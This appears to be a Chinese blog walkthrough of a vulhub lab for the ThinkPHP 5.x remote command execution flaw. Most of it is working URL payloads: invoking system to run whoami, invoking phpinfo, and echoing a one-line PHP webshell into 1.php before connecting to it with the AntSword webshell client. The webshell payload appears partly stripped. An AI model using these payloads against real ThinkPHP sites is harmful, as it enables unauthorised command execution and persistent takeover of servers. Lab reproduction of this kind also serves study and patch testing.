Thinkphp5x远程命令执行 靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC: ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

相关推荐
元亓亓亓17 小时前
SSM--day4--SpringMVC(补充)
java·后端·ssm
沐雨橙风ιε18 小时前
Spring Boot整合Apache Shiro权限认证框架(应用篇)
java·spring boot·后端·apache shiro
十重幻想18 小时前
PTA6-5 使用函数求1到10的阶乘和(C)
java·c语言·算法
考虑考虑18 小时前
fastjson调用is方法开头注意
java·后端·java ee
小蒜学长18 小时前
springboot基于javaweb的小零食销售系统的设计与实现(代码+数据库+LW)
java·开发语言·数据库·spring boot·后端
brzhang18 小时前
为什么 OpenAI 不让 LLM 生成 UI?深度解析 OpenAI Apps SDK 背后的新一代交互范式
前端·后端·架构
TT哇18 小时前
【多线程-进阶】常⻅的锁策略
java
EnCi Zheng19 小时前
JPA 连接 PostgreSQL 数据库完全指南
java·数据库·spring boot·后端·postgresql
brzhang19 小时前
OpenAI Apps SDK ,一个好的 App,不是让用户知道它该怎么用,而是让用户自然地知道自己在做什么。
前端·后端·架构
LucianaiB19 小时前
从玩具到工业:基于 CodeBuddy code CLI 构建电力变压器绕组短路智能诊断系统
后端
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02GitHub 镜像站点03UV安装并设置国内源04PHP htmlspecialchars()函数详解05两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答06BongoCat - 跨平台键盘猫动画工具07Linux下V2Ray安装配置指南08jdk21下载、安装(Windows、Linux、macOS)0946个Nano-banana 精选提示词,持续更新中10零基础搭建赛博朋克个人主页:蓝耘Claude Code完整实战教程